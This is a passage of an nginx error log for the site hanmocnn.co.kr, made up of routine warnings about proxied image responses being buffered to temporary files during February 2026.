*40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000011044 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:15:43 [warn] 901#901: *40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000011045 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:19:50 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000011046 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000011047 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000011048 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000011049 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000011050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000011051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000011052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000011053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000011054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:47:51 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000011055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000011056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000011057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000011058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000011059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000011060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000011061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/54/0000012548 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000012549 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000012550 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000014068 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000014069 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000014070 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 21:56:56 [warn] 932#932: *92717 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/93/0000015936 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/93/0000015937 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/93/0000015938 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/93/0000015939 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:51:14 [warn] 933#933: *92816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/94/0000015940 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:56:48 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/94/0000015941 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/94/0000015942 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/94/0000015943 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 22:57:00 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/94/0000015944 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/94/0000015945 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/94/0000015946 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/94/0000015947 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/94/0000015948 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:01:25 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/94/0000015949 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/95/0000015950 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/95/0000015951 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/95/0000015952 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/95/0000015953 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:13:03 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/95/0000015954 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/95/0000015955 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/95/0000015956 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000015957 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000015958 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/95/0000015959 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/96/0000015960 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/96/0000015961 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/96/0000015962 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000015963 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000015964 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:43:40 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000015965 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:43:46 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000015966 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:43:50 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/96/0000015967 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:44:00 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/96/0000015968 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/96/0000015969 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000015970 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000015971 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000015972 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000015973 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000015974 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000015975 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000015976 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000015977 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000015978 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000015979 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000015980 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000015981 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" +2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000015982 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: 